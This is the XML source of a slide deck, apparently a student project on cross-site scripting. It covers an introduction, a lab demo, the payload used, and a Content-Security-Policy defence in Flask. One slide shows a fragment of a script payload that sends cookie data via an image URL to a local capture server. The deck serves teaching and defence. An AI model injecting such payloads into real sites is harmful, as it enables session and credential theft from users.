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Viga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482F90-C403-4222-BD02-C7E6FFA9624F}">
  <a:tblStyle styleId="{A5482F90-C403-4222-BD02-C7E6FFA96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8" y="48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34CAB-F234-4C29-A380-733E87FBA9F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B0E4A-C5C0-4832-9E57-E1CD34E2F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6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64248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04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1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82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88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694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253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3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cap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4128808" y="405919"/>
            <a:ext cx="3998969" cy="4575284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52626" y="527325"/>
            <a:ext cx="4387514" cy="1871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XSS (Cross-site scripting)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488757" y="3518775"/>
            <a:ext cx="315994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Zohra Sardar (P20-0754)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Afshan Naeem (P21-8010)</a:t>
            </a:r>
            <a:endParaRPr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06680" y="213359"/>
            <a:ext cx="3731437" cy="4754881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XSS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6625" y="1260987"/>
            <a:ext cx="7322400" cy="2879088"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/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 stands for Cross-site scripting.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security vulnerability where hackers add harmful code (JavaScript) to a website.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1524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runs into another user’s browsers , stealing their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XSS attack technique used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951271"/>
            <a:ext cx="3840763" cy="363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form creation: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simple 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2.Payload injection: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injected a malicious JavaScript payload into the search form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3.Information capture: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payload is submitted, it sends sensitive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local server.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4" y="951271"/>
            <a:ext cx="3840763" cy="363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entered the malicious code into the search box, the payload triggered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sent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Flask server, where it was displayed in the terminal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vulnerability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captured data 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749388" y="734371"/>
            <a:ext cx="4394612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818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Used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6625" y="1260987"/>
            <a:ext cx="7322400" cy="2879088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Image();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img.src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http://127.0.0.1:5000/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capture?data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encodeURIComponent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);&lt;/script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script:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1524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image element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data to the local server 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127.0.0.1:5000/capture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sent as part of the URL query string.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1524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5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method (CSP)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6625" y="1260987"/>
            <a:ext cx="7322400" cy="2879088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Works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header (content-security-policy) which contain rules that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which resources can be loaded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5240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resources from trusted sources (e.g., your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allowed. All other resources, such as inline scripts, are blocked.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7026" y="3244645"/>
            <a:ext cx="74700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flask import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>make_response</a:t>
            </a:r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app.after_request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add_csp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(response):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>response.headers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>["Content-Security-Policy"] = "script-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 'self'"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    return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0" y="1629697"/>
            <a:ext cx="6477333" cy="1987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10" y="2897574"/>
            <a:ext cx="6458282" cy="160028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6625" y="1260986"/>
            <a:ext cx="7322400" cy="3318387"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="15240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form: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 data captured on local server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42" y="1297109"/>
            <a:ext cx="6877403" cy="280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6625" y="1260987"/>
            <a:ext cx="7322400" cy="2879088"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="152400" indent="0"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333862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287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DM Sans</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Viga</vt:lpstr>
      <vt:lpstr>Cyber Security Business Plan</vt:lpstr>
      <vt:lpstr>XSS (Cross-site scripting)</vt:lpstr>
      <vt:lpstr>Introduction to XSS</vt:lpstr>
      <vt:lpstr>XSS attack technique used</vt:lpstr>
      <vt:lpstr>Result</vt:lpstr>
      <vt:lpstr>Payload Used</vt:lpstr>
      <vt:lpstr>Prevention method (CSP)</vt:lpstr>
      <vt:lpstr>Screenshots</vt:lpstr>
      <vt:lpstr>Cookie data captured on local server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XSS (Cross-site scripting)</dc:title>
  <dc:creator>Afshan Naeem</dc:creator>
  <cp:lastModifiedBy>Afshan</cp:lastModifiedBy>
  <cp:revision>13</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-12-02T03:50:13Z</dcterms:modified>
</cp:coreProperties>
</file>